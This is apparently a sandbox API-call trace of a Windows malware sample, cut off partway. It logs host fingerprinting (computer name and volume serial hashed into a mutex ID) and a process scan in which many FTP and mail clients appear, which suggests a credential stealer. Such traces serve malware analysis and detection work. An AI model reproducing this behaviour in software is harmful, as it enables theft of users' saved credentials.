[0196.569] Sleep (dwMilliseconds=0xa) [0196.584] Sleep (dwMilliseconds=0xa) [0196.600] Sleep (dwMilliseconds=0xa) [0196.648] Sleep (dwMilliseconds=0xa) [0196.694] Sleep (dwMilliseconds=0xa) [0196.737] Sleep (dwMilliseconds=0xa) [0196.740] Sleep (dwMilliseconds=0xa) [0196.756] Sleep (dwMilliseconds=0xa) [0196.771] Sleep (dwMilliseconds=0xa) [0196.787] Sleep (dwMilliseconds=0xa) [0196.804] Sleep (dwMilliseconds=0xa) [0196.825] Sleep (dwMilliseconds=0xa) [0196.872] Sleep (dwMilliseconds=0xa) [0196.925] Sleep (dwMilliseconds=0xa) [0196.982] Sleep (dwMilliseconds=0xa) [0196.990] Sleep (dwMilliseconds=0xa) [0197.026] Sleep (dwMilliseconds=0xa) [0197.039] Sleep (dwMilliseconds=0xa) [0197.053] Sleep (dwMilliseconds=0xa) [0197.068] Sleep (dwMilliseconds=0xa) [0197.126] Sleep (dwMilliseconds=0xa) [0197.162] GetSystemDirectoryA (in: lpBuffer=0x276fc80, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0197.162] lstrcatW (in: lpString1="", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" | out: lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" [0197.163] RtlGetVersion (in: lpVersionInformation=0x2580457 | out: lpVersionInformation=0x2580457*(dwOSVersionInfoSize=0x0, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0197.163] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x276fc68 | out: TokenHandle=0x276fc68*=0x7ec) returned 1 [0197.163] GetTokenInformation (in: TokenHandle=0x7ec, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x276fc60 | out: TokenInformation=0x0, ReturnLength=0x276fc60) returned 0 [0197.163] RtlAllocateHeap (HeapHandle=0x6060000, Flags=0x8, Size=0x25) returned 0x60612f0 [0197.163] GetTokenInformation (in: TokenHandle=0x7ec, TokenInformationClass=0x19, TokenInformation=0x60612f0, TokenInformationLength=0x1c, ReturnLength=0x276fc60 | out: TokenInformation=0x60612f0, ReturnLength=0x276fc60) returned 1 [0197.164] GetSidSubAuthorityCount (pSid=0x6061300*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x6061301 [0197.164] GetSidSubAuthority (pSid=0x6061300*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x6061308 [0197.164] RtlSizeHeap (HeapHandle=0x6060000, Flags=0x0, MemoryPointer=0x60612f0) returned 0x25 [0197.164] RtlFreeHeap (HeapHandle=0x6060000, Flags=0x0, BaseAddress=0x60612f0) returned 1 [0197.164] CloseHandle (hObject=0x7ec) returned 1 [0197.164] GetComputerNameA (in: lpBuffer=0x276fd30, nSize=0x276fd70 | out: lpBuffer="Q9IATRKPRH", nSize=0x276fd70) returned 1 [0197.164] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x276fd60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x276fd60*=0x8443a5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0197.165] RtlAllocateHeap (HeapHandle=0x6060000, Flags=0x8, Size=0x29) returned 0x60612f0 [0197.165] RtlAllocateHeap (HeapHandle=0x6060000, Flags=0x8, Size=0x14) returned 0x6061330 [0197.165] wsprintfA (in: param_1=0x60612f0, param_2="%s%08X%08X" | out: param_1="Q9IATRKPRH99FC78698443A5AF") returned 26 [0197.165] CryptAcquireContextA (in: phProv=0x276fcb8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x276fcb8*=0x7105d10) returned 1 [0197.167] CryptCreateHash (in: hProv=0x7105d10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x276fcb0 | out: phHash=0x276fcb0) returned 1 [0197.167] lstrlenA (lpString="Q9IATRKPRH99FC78698443A5AF") returned 26 [0197.167] CryptHashData (hHash=0x3e8c550, pbData=0x60612f0, dwDataLen=0x1a, dwFlags=0x0) returned 1 [0197.167] CryptGetHashParam (in: hHash=0x3e8c550, dwParam=0x2, pbData=0x276fcc0, pdwDataLen=0x276fcf0, dwFlags=0x0 | out: pbData=0x276fcc0, pdwDataLen=0x276fcf0) returned 1 [0197.167] wsprintfA (in: param_1=0x258020c, param_2="%02X" | out: param_1="4B") returned 2 [0197.167] wsprintfA (in: param_1=0x258020e, param_2="%02X" | out: param_1="CD") returned 2 [0197.167] wsprintfA (in: param_1=0x2580210, param_2="%02X" | out: param_1="65") returned 2 [0197.167] wsprintfA (in: param_1=0x2580212, param_2="%02X" | out: param_1="9A") returned 2 [0197.167] wsprintfA (in: param_1=0x2580214, param_2="%02X" | out: param_1="D8") returned 2 [0197.167] wsprintfA (in: param_1=0x2580216, param_2="%02X" | out: param_1="F3") returned 2 [0197.167] wsprintfA (in: param_1=0x2580218, param_2="%02X" | out: param_1="47") returned 2 [0197.167] wsprintfA (in: param_1=0x258021a, param_2="%02X" | out: param_1="B5") returned 2 [0197.168] wsprintfA (in: param_1=0x258021c, param_2="%02X" | out: param_1="B4") returned 2 [0197.168] wsprintfA (in: param_1=0x258021e, param_2="%02X" | out: param_1="51") returned 2 [0197.168] wsprintfA (in: param_1=0x2580220, param_2="%02X" | out: param_1="91") returned 2 [0197.168] wsprintfA (in: param_1=0x2580222, param_2="%02X" | out: param_1="8C") returned 2 [0197.168] wsprintfA (in: param_1=0x2580224, param_2="%02X" | out: param_1="D8") returned 2 [0197.168] wsprintfA (in: param_1=0x2580226, param_2="%02X" | out: param_1="91") returned 2 [0197.168] wsprintfA (in: param_1=0x2580228, param_2="%02X" | out: param_1="C8") returned 2 [0197.168] wsprintfA (in: param_1=0x258022a, param_2="%02X" | out: param_1="23") returned 2 [0197.168] CryptDestroyHash (hHash=0x3e8c550) returned 1 [0197.168] CryptReleaseContext (hProv=0x7105d10, dwFlags=0x0) returned 1 [0197.168] wsprintfA (in: param_1=0x258022c, param_2="%08X" | out: param_1="8443A5AF") returned 8 [0197.168] RtlSizeHeap (HeapHandle=0x6060000, Flags=0x0, MemoryPointer=0x6061330) returned 0x14 [0197.168] RtlFreeHeap (HeapHandle=0x6060000, Flags=0x0, BaseAddress=0x6061330) returned 1 [0197.168] RtlSizeHeap (HeapHandle=0x6060000, Flags=0x0, MemoryPointer=0x60612f0) returned 0x29 [0197.168] RtlFreeHeap (HeapHandle=0x6060000, Flags=0x0, BaseAddress=0x60612f0) returned 1 [0197.169] RtlAllocateHeap (HeapHandle=0x6060000, Flags=0x8, Size=0xe) returned 0x60612f0 [0197.169] wsprintfA (in: param_1=0x2580dbe, param_2="%sFF" | out: param_1="4BCD659AD8F347B5B451918CD891C8238443A5AFFF") returned 42 [0197.169] RtlSizeHeap (HeapHandle=0x6060000, Flags=0x0, MemoryPointer=0x60612f0) returned 0xe [0197.169] RtlFreeHeap (HeapHandle=0x6060000, Flags=0x0, BaseAddress=0x60612f0) returned 1 [0197.169] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned 0x7ec [0197.169] RtlGetLastWin32Error () returned 0xb7 [0197.169] CloseHandle (hObject=0x7ec) returned 1 [0197.169] RtlExitUserThread (Status=0x0) Thread: id = 106 os_tid = 0xef0 [0157.049] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1518 [0157.057] Process32First (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.058] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0157.060] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0157.061] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0157.062] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0157.064] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0157.065] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0157.066] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0157.068] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0157.069] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0157.071] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.072] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.074] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.075] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.076] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.078] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.079] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0157.080] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0157.082] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.083] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0157.084] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0157.160] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.161] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0157.163] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0157.164] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0157.165] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.167] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0157.169] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0157.170] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x804, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0157.171] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="sufferexistrich.exe")) returned 1 [0157.173] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="have return physical.exe")) returned 1 [0157.174] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="or level.exe")) returned 1 [0157.175] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="court camera.exe")) returned 1 [0157.177] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="or-finger.exe")) returned 1 [0157.178] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel imagine recently.exe")) returned 1 [0157.180] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="school_for.exe")) returned 1 [0157.181] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x978, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whosefirmthe.exe")) returned 1 [0157.182] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="seat_raise_join.exe")) returned 1 [0157.184] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="formerbuildpresent.exe")) returned 1 [0157.185] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="unittype.exe")) returned 1 [0157.186] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="allow.exe")) returned 1 [0157.188] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="rate.exe")) returned 1 [0157.189] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pushweight.exe")) returned 1 [0157.190] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="film.exe")) returned 1 [0157.192] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="dead.exe")) returned 1 [0157.193] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="than.exe")) returned 1 [0157.218] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0157.220] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0157.221] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0157.223] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0157.224] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0157.226] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0157.227] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0157.229] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0157.230] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0157.232] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0157.233] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0157.235] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0157.236] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0157.239] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0157.240] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0157.242] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x810, 